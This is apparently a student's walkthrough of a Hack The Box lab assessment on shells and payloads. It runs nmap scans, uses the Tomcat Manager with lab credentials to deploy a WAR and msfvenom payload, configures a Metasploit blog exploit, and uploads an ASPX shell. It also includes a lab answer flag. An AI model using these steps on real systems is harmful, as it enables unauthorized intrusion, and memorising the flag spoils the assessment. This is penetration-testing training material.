Run an initial nmap scan for the first question to get a brief of whats going on on the host
┌─[htb-student@skills-foothold]─[~]
└──╼ $nmap -A 172.16.1.11
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-12 12:01 EDT
Nmap scan report for status.inlanefreight.local (172.16.1.11)
Host is up (0.044s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Inlanefreight Server Status
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
515/tcp open printer Microsoft lpd
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SHELLS-WINSVR
| NetBIOS_Domain_Name: SHELLS-WINSVR
| NetBIOS_Computer_Name: SHELLS-WINSVR
| DNS_Domain_Name: shells-winsvr
| DNS_Computer_Name: shells-winsvr
| Product_Version: 10.0.17763
|_ System_Time: 2025-04-12T16:02:53+00:00
| ssl-cert: Subject: commonName=shells-winsvr
| Not valid before: 2025-04-11T15:42:55
|_Not valid after: 2025-10-11T15:42:55
|_ssl-date: 2025-04-12T16:02:58+00:00; 0s from scanner time.
8080/tcp open http Apache Tomcat 10.0.11
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/10.0.11
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: shells-winsvr
| NetBIOS computer name: SHELLS-WINSVR\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-04-12T09:02:53-07:00
|_nbstat: NetBIOS name: SHELLS-WINSVR, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:4e:ae (VMware)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-04-12T16:02:53
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 1h24m00s, deviation: 3h07m49s, median: 0s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.78 seconds
The host name is: shells-winsvr
This is a Windows Server 2019
Lets begin with some recon on the target
We shall visit the web server first and see whats going on there if there is any upload exploits that can be exploited.
Checked if Firefox was installed because I was not seeing an installation application
Then launched web server
Seems to be an Apache Tomcat/10.0.11 Webserver running
Lets look for some exploits for this version.
So far seems to be none that could provide us with an initial access
Next i've identified something that looks pretty promising
The Manager Web_App for Tomcat it seems
It also shows where the users are defined
When I click on the manaegr_webapp, it does bring me to someone of access authentication page, but the thing is we don't know the password yet
I took the shortcut method and checked for the Hint for Host-01.
We got told that there are two vulnerabilities
The creds for potentially vulnerable process is tomcat | Tomcatadm
I will revisit how to get the credentials later
I tested this in the above Manager page that I identified previously and the credentials worked
Now Lets explore this page
Got some nice info about the server
We have some sort of Upload feature here
Now, based on the above upload feature, what exactly is a WAR file? quick GPT search and we get
So we will need a WAR Payload to upload to the Tomcat Server
But what tool can do this?
Quick search on my own VM and we can identify that there is a cmd.war payload
Lets try it on the Remote Host
Boom! the Remote host also has the same thing
Lets copy this file to a better location
Lets try and upload this f***** payload
Go back to the browser and try upload it
Press Deploy and see what happens?
We see that a new application was added, so i guess the upload worked?
Lets try and browse to his directory now
Seems like this payload method doesn't work
We could try another method of creating a payload
PAYLOAD WITH MSFVENOM
Setup a listener on the Attacker machine
This will listen on port 8081 for any connections to that port
Setup MSFVENOM Payload
Set the IP Address and the PORT
Set the type of payload
We will use this payload and try upload it through the tomcat manager platform again and see if we get a shell
I tried it and realized it doesnt work, but the issue is that the payload type i set it to windows, where the platform is a apache webserver which uses JavaScript, so my bad, will change the payload type and hopefully it works this time.
BOOM, now it works, we have a shell
So we are done with HOST-01, lets move onto the next
HOST-02
Enum
Nmap Scan
┌─[htb-student@skills-foothold]─[~]
└──╼ $nmap blog.inlanefreight.local -A
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-13 02:16 EDT
Nmap scan report for blog.inlanefreight.local (172.16.1.12)
Host is up (0.037s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 f6:21:98:29:95:4c:a4:c2:21:7e:0e:a4:70:10:8e:25 (RSA)
| 256 6c:c2:2c:1d:16:c2:97:04:d5:57:0b:1e:b7:56:82:af (ECDSA)
|_ 256 2f:8a:a4:79:21:1a:11:df:ec:28:68:c2:ff:99:2b:9a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Inlanefreight Gabber
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.75 seconds
So we know that it is an Ubuntu machine that is running
There is SSH
We can try to access it later
There is a HTTP Webserver running
We see robots.txt > Something we can explore for hidden directories
Have you taken the time to validate the scan results? Did you browse to the webpage being hosted? blog.inlanefreight.local looks like a nice space for team members to chat. If you need the credentials for the blog, " admin:admin123!@# " have been given out to all members to edit their posts. At least, that's what our recon showed.
Checking out the Webserver
Seems to be a guy named Slade Wilson posting some post on the blog website
The question in HTB ask something similar to the blog post by Slade Wilson
Lets check out the post maybe we can identify an answer
The answer is: php
Basically look at the link of the exploit and read through the code and you will see the following
Now to exploit this blog website, i guess we will have to identify a way to upload this exploit, so lets have a look back at the blog.
Seems to be a login for the user Slade Wilson.. ummm interesting..
I wounder what the credentials could be....
If we check the Hints for Host-2 we get some sort of credentials for the blog, lets try and use that
admin:admin123!@#
We gain access as Slade Wilson, nice!
We can now create some blog post as Slade Wilson
Exploitation - With Metasploit
To exploit this we can use Metasploit which should have the exploit module identified by Slade Wilson.
Lets try
msfconsole -q
msf](Jobs:0 Agents:0) >> use 50064.rb
[*] Using configured payload php/meterpreter/bind_tcp
[msf](Jobs:0 Agents:0) exploit(50064) >> show options
Module options (exploit/50064):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD demo yes Blog password
Proxies no A proxy chain of format type:host:por
t[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identi
fier, or hosts file with syntax 'file
:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connec
tions
TARGETURI / yes The URI of the arkei gate
USERNAME demo yes Blog username
VHOST no HTTP server virtual host
Payload options (php/meterpreter/bind_tcp):
Now we set the options required
set VHOST blog.inlanefreight.local
We need to identify the IP Address of the Blog Web Server
└──╼ $ping -c 1000 blog.inlanefreight.local
PING blog.inlanefreight.local (172.16.1.12) 56(84) bytes of data.
64 bytes from blog.inlanefreight.local (172.16.1.12): icmp_seq=1 ttl=64 time=0.423 ms
64 bytes from blog.inlanefreight.local (172.16.1.12): icmp_seq=2 ttl=64 time=0.481 ms
64 bytes from blog.inlanefreight.local (172.16.1.12): icmp_seq=3 ttl=64 time=0.612 ms
^C
--- blog.inlanefreight.local ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2055ms
rtt min/avg/max/mdev = 0.423/0.505/0.612/0.079 ms
Now we set the remaining options
[msf](Jobs:0 Agents:0) exploit(50064) >> set VHOST blog.inlanefreight.local
VHOST => blog.inlanefreight.local
[msf](Jobs:0 Agents:0) exploit(50064) >> set RHOSTS 172.16.1.12
RHOSTS => 172.16.1.12
[msf](Jobs:0 Agents:0) exploit(50064) >> set RHOST 172.16.1.12
RHOST => 172.16.1.12
[msf](Jobs:0 Agents:0) exploit(50064) >> set USERNAME admin
USERNAME => admin
[msf](Jobs:0 Agents:0) exploit(50064) >> set PASSWORD admin123!@#
PASSWORD => admin123!@#
Now lets exploit this shit... and BOOM we are in!!
HTB ANSWER: B1nD_Shells_r_cool
HOST-03
Enum
nmap scan
┌─[root@skills-foothold]─[/home/htb-student]
└──╼ #nmap -A 172.16.1.13
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-13 12:04 EDT
Nmap scan report for 172.16.1.13
Host is up (0.0034s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: 172.16.1.13 - /
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
MAC Address: 00:50:56:B0:6C:CC (VMware)
Device type: general purpose
Running: Microsoft Windows 2016
OS CPE: cpe:/o:microsoft:windows_server_2016
OS details: Microsoft Windows Server 2016 build 10586 - 14393
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h19m59s, deviation: 4h02m29s, median: 0s
|_nbstat: NetBIOS name: SHELLS-WINBLUE, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:6c:cc (VMware)
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: SHELLS-WINBLUE
| NetBIOS computer name: SHELLS-WINBLUE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-04-13T09:05:19-07:00
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-04-13T16:05:19
|_ start_date: 2025-04-13T15:06:06
TRACEROUTE
HOP RTT ADDRESS
1 3.43 ms 172.16.1.13
Enumerating Webserver
When we visit the website, we see its just a directory listing
We see that there is an upload.aspx used for uploading aspx files, so in this case we can create an aspx payload utilizing various methods to gain a shell
Now lets change some settings, most likely the allowed IPs, lets see
Ive added the foothold's IP Address
Now lets try and uplaod this payload and see if we can get a shell
IT WORKED!!!!
ummmmm... Its seems that access is denied when trying to change directory into the Administrator account
I did look at the hint, it mentioned Blue, so this means that his host is vulnerable to Eternal Blue.. I went into a loophole through the webserver, but still at least we got a shell through their, we woulc have maybe done it another way..
